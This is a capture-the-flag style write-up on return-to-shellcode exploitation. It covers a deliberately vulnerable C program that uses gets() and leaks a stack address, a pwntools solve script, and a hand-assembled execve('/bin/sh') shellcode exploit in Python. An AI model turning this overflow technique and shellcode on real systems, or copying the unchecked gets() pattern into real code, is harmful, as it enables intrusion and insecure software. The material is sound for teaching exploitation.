Return To Shellcode #
Description #
Sometimes it is possible to inject our own code into a program. The code we inject is commonly called “shellcode”, because the classic payload spawns a shell.
Once we’ve injected our shellcode into the process, we redirect execution to it and it runs with the privileges of the target. This needs two things: we must know the address where the shellcode landed, and that memory must be executable. Commonly we want to call /bin/sh.
Example #
#include <stdio.h>
#include <string.h>
// gcc -no-pie -fno-stack-protector -z execstack -g -o chal chal.c
//   -fno-stack-protector: no canary between buffer1 and the saved return address
//   -z execstack:         the stack is mapped executable, so code placed in buffer1 can run
//   -no-pie:              fixed code addresses (not needed here, since the stack address is leaked)
int main() {
    char buffer1[128];
    printf("The buffer is located at: %p\n", buffer1);  // leaks the stack address, defeating ASLR
    gets(buffer1);  // no length check: everything past 128 bytes overwrites saved rbp and the return address
    return 0;
}
Solution #
We will write the shellcode into buffer1 on the stack, then use the overflow from gets() (which reads until a newline with no length check) to overwrite the saved return address with the leaked buffer address, so that when main returns it lands in our shellcode. Three things make this possible: -fno-stack-protector (no canary to trip), -z execstack (the stack is executable), and the printf leak (we know the address on every run despite ASLR). The return address sits 128 bytes of buffer plus 8 bytes of saved rbp past the start of buffer1; confirm that offset in a debugger, since the compiler may leave padding between buffer1 and the saved frame pointer. One caveat: gets() stops at a newline, so the shellcode and the packed addresses must not contain a 0x0a byte.
Solve Script #
import pwn

elf = pwn.ELF("./chal")
pwn.context.binary = elf          # sets arch/os so shellcraft and asm() emit amd64 code
p = elf.process()                 # pwntools gives the target a pty on stdout, so the leak is flushed

shellcode = pwn.shellcraft.sh()   # execve("/bin/sh") assembly for the current arch
print(shellcode)
shellcode = pwn.asm(shellcode)    # assemble to raw bytes

p.recvuntil(b"The buffer is located at: ")
buffer_address = int(p.recvline().strip(), 16)   # the printf leak defeats stack ASLR
print(f"{hex(buffer_address)=}")

# Layout: 128 bytes of buffer1 (shellcode, NUL padded; gets() copies NULs and only stops at '\n'),
# 8 bytes of saved rbp (any value, main never uses it again), then the return address -> buffer1.
payload = shellcode.ljust(128, b'\x00') + pwn.p64(0xdeadbeef) + pwn.p64(buffer_address)
p.sendline(payload)
p.interactive()
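The same attack built by hand, without pwntools, so that every field of the 144-byte line sent to gets() is explicit. This is an added example and not part of the original writeup or of pwntools: the shellcode is a standard 27-byte Linux x86-64 execve("/bin/sh") sequence assembled here rather than shellcraft's output, the 136-byte distance from buffer1 to the return address assumes the saved rbp sits directly above buffer1 (confirm in gdb before relying on it), and exploit() drives ./chal with a pty on stdout, which is what pwntools' process() does so that the target's printf() output is flushed before gets() blocks.

```python
import os, pty, select, struct, subprocess, sys

# Hand-assembled Linux x86-64 execve("/bin/sh", ["/bin/sh"], NULL), 27 bytes,
# containing neither 0x00 nor 0x0a, so gets() copies it intact.
SHELLCODE = bytes([
    0x31, 0xc0,                                  # xor    eax, eax
    0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91,          # movabs rbx, 0xff978cd091969dd1
    0xd0, 0x8c, 0x97, 0xff,                      #        (that is -"/bin/sh\0")
    0x48, 0xf7, 0xdb,                            # neg    rbx      -> "/bin/sh\0"
    0x53,                                        # push   rbx
    0x54,                                        # push   rsp
    0x5f,                                        # pop    rdi      -> rdi = "/bin/sh"
    0x99,                                        # cdq             -> rdx = NULL (envp)
    0x52,                                        # push   rdx
    0x57,                                        # push   rdi
    0x54,                                        # push   rsp
    0x5e,                                        # pop    rsi      -> rsi = ["/bin/sh", NULL]
    0xb0, 0x3b,                                  # mov    al, 59   (SYS_execve)
    0x0f, 0x05,                                  # syscall
])

BUF_SIZE = 128        # sizeof(buffer1) in chal.c
SAVED_RBP_SIZE = 8    # assumption: saved rbp lies directly above buffer1; verify in gdb
RET_OFFSET = BUF_SIZE + SAVED_RBP_SIZE   # 136 bytes from buffer1 to the return address
RBP_FILLER = 0xdeadbeef                  # main never dereferences rbp again, any value works


def p64(value):
    """Little-endian 64-bit pack, like pwn.p64()."""
    return struct.pack("<Q", value)


def parse_leak(line):
    """Turn b'The buffer is located at: 0x7ffd...\\n' (or \\r\\n from a pty) into an int."""
    prefix = b"The buffer is located at: "
    if not line.startswith(prefix):
        raise ValueError("unexpected leak line: %r" % line)
    return int(line[len(prefix):].strip(), 16)


def has_forbidden_bytes(data):
    """gets() stops at '\\n', so a 0x0a anywhere would truncate the payload."""
    return b"\n" in data


def build_payload(buffer_address, shellcode=SHELLCODE):
    """[shellcode + NUL padding to 128][saved rbp][return address -> buffer1]."""
    if len(shellcode) > BUF_SIZE:
        raise ValueError("shellcode does not fit in buffer1")
    payload = shellcode.ljust(BUF_SIZE, b"\x00")   # NULs are fine, only '\n' ends the read
    payload += p64(RBP_FILLER)
    payload += p64(buffer_address)
    if has_forbidden_bytes(payload):
        # e.g. a stack address such as 0x7ffd...0a..; rerun the target for a fresh address
        raise ValueError("payload contains a newline, re-run to get a different stack address")
    return payload


def exploit(target="./chal"):
    """Spawn the target, read the leak, send the payload, then relay our terminal to the shell."""
    master, slave = pty.openpty()                 # pty keeps the target's stdout line-buffered
    proc = subprocess.Popen([target], stdin=subprocess.PIPE, stdout=slave, stderr=slave, bufsize=0)
    os.close(slave)
    leak = b""
    while not leak.endswith(b"\n"):               # read exactly one line, nothing beyond it
        leak += os.read(master, 1)
    addr = parse_leak(leak)
    print("buffer1 is at", hex(addr))
    proc.stdin.write(build_payload(addr) + b"\n")  # the trailing '\n' terminates gets()
    proc.stdin.flush()
    while proc.poll() is None:                    # minimal equivalent of p.interactive()
        ready, _, _ = select.select([sys.stdin, master], [], [])
        if master in ready:
            try:
                data = os.read(master, 4096)
            except OSError:                       # pty closes when the shell exits
                break
            sys.stdout.buffer.write(data)
            sys.stdout.buffer.flush()
        if sys.stdin in ready:
            line = sys.stdin.buffer.readline()
            if not line:
                break
            proc.stdin.write(line)
            proc.stdin.flush()


if __name__ == "__main__":
    exploit(sys.argv[1] if len(sys.argv) > 1 else "./chal")
```

Run it as `python3 ret2shellcode.py ./chal` and type commands into the shell it hands you. If build_payload() raises because the leaked address happens to contain a 0x0a byte, simply run it again: ASLR gives a different stack address on every execution, which is exactly why the leak is read at runtime rather than baked into the payload.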